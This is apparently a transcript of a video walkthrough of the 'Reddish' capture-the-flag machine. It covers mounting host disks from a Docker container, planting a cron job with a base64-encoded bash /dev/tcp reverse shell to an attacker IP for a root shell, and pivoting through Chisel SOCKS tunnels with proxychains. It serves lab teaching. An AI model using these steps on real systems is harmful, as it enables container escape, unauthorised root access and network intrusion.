UMask, password storage, CronJobs. Nothing interesting there. Network information, nothing. ARP table doesn't have anything. Coming up with a lot of just not interesting things. SUID and GUID not really going to be interesting because, well, we're already root. NFS, nothing. And I think that's it. So we didn't really come up with anything. If we do a ls on /dev and just look at what Docker stuff we have, let's scroll up. looking at our block devices, bunch of loop, we get a bunch of SDAs. And if we just do ls/dev sd, and if we go back to like our database Docker, that one we don't have an active terminal on. This one we do, ls/dev sd, we don't have anything. Everything's mounted as ls/dev grep sd. So it's mounted oddly. We see dev sda1 is mounted, but if we look in /dev, we don't see it. If we do --c ls/dev, see if it's that way, we just don't. Dev is relatively empty. But if we go in our database container, we have a bunch of things. So let's try mounting one of them. We're just running mount first. And we see SDA1 on etcresolve.conf, SDA1 on /backup. If we look at backup, we just have the web server because that's what it's backing up. But let's just make a directory on temp called SDA 1, 2, 3, 4, 5, 6, 7, I think. ls. Those are all directories. So ls/dev sd. So we'll mount dev sda1 on sda1, mount dev sda2 on sda2, and so on. And we're going to see what all these disks are. That looks like it may be a swap. Okay, so the SDA5 is swap. I don't know what SDA 4 was, but let's just look at SDA1, and we see a file system. So let's go into SDA1. We can go into root, and we can see root.txt finally. wc-c, root.txt. We see it's 33 characters. There's also a .ssh, but SSH wasn't exposed, so that's not that interesting. If we look at SDA2, looks like this is /boot. If we look at SDA3, this is probably home. Do we have any files here of interest? We do not. And SDA4, I don't think mounted. So if we wanted to, we could go into SDA1, go into etc cron.d, and then go back here. I don't know where we have it. The reverse shell, we'll just do it again. So echo, what is it? 1, 2, 3, 4, 5, root, and then echo bash dev tcp 10.10.14.3, and we'll say this on port 101, like that, just because I know that port hasn't been used before and we've used a lot of ports. So, and then was it 0 and 1? That looks good. Base 64 it. Copy this. And we can just do it here. Echo 1, 2, 3, 4, 5, root. Echo that. Base 64-D. Bash. 2. Run me. nclvn p 10101. Date. And within probably the next 30 seconds, we should get a shell from Reddish as root. There we go. We have a shell. If we do ls, we see root.txt, wc, root.txt, and this box, since we're probably not in Docker, we should have Python, so we can do import pty, pty.spawn, bin bash, and there you have it. Reddish is now completely rooted. If we do ipaddr, we can see all the network interfaces. So, hope you guys enjoyed that box. Now that we have this done, we're going to be going back a little bit, do one last thing with a proxy, and then call it a video. So let's hop back into PowerPoint so we can show you a reverse socks proxy. So throughout this video, we've been just creating all the tunnels manually, which is great for understanding exactly how it works, but when it comes to scaling, it becomes very tough. It would be amazing if you could just say, hey, all the traffic we're going from here, let's just send it over to this box and then trust this box's routing table to decide where it goes. So when we want to talk to a web server, we can. And then if we want to just say, you know what? Actually, we didn't want port 80. We want port 22. We don't have to go create a whole new tunnel because we just have the socks proxy working. And Chisel is capable of doing this. It's just got one tiny catch, and that is the socks client only works when it is in client mode. And in most cases, we'll be running Chisel in server mode. So to get it working in client mode on the server, we actually have to do kind of a chisel in a chisel. So let's just look at exactly how it works. The first thing is we stand up Chisel standard on port 8000 and allow reverse connections. And then on the client, we're going to connect with this and then create a reverse connection on port 8001 and forward that to localhost port LEET 1337. And then we're going to run a second Chisel command on this client as a server. And we're going to say chisel server-p LEET --socks 5. And that's going to create a Chisel server that allows socks 5 connections. And now anything we send over port 8001 goes through this tunnel and hits the Chisel server. So that means back on our box, we can run a Chisel client on localhost and point it to 8001 and go through, and then we get the socks client. So let's just look at exactly how this works and what benefit this provides to us. So I've reconnected the box and killed all my Chisel connections, so we should be at a clean slate. The first thing we want to do is stand up a Chisel server on our Kali box. So we'll do Chisel server-p 8000 reverse, and then we want to stand up the client. So temp Chisel client 10.10.14.3 port 8000. We want a reverse connection 8001 127.0.0.1 LEET. And we see we get a connection back. We are listening. So now we have to stand up the server. So temp Chisel server-p LEET. And we want --socks 5 to allow a socks client. So now back on our box, we can run another Chisel. So /chisel client 127.0.0.1 and port 8001. And we want to be socks. And it doesn't look like it worked because I have a typo. I put an L there for some reason. Connect here. We are connected. And now if we do a netstat ALNP grep for 1080, we see we have Chisel listing on that socket. So we should be able to do a nmap --proxy socks 5 172.19.0.3 port 80 TCP. And that doesn't work. Let's try --proxy that way and do proxy-type socks 5. I'm not sure how to do it with nmap flags. Let's just do etc proxy chains. We have socks 5 127.0.0.1 on 1080. We also have quiet mode uncommented. If we don't have this, then it's pretty noisy. Noisy as in, like, we'll do it after this. So we'll do proxy chains and map-st 172.19.03-p80, and we'll do 22 as well. And we'll see if this does work. We also have to specify -PN because we can't ping the host, and we can see that 80 is open, 22 is not. And if we took off that quiet option, because I think that's default of quiet being disabled, and do this, we see all the output from proxy chains, and I just don't like that. So we can disable that. And then, voila. We could also do proxy chains curl 172.19.03. Do it that way. I also have, I think Reddish installed on my Kali box. Is it? Let's see. Reddish client. Reddish CLI. Proxy change Reddish CLI on 172.19.02. I guess there's a -H maybe? There we go. And then we could also do it this way. So this is echo no authentication. And we can see no authentication is on that Redis instance. So that is how you do the socks proxy if you wanted to. And that would also make this box a lot easier. So hope you guys enjoyed the video. Take care, and I will see you all next week.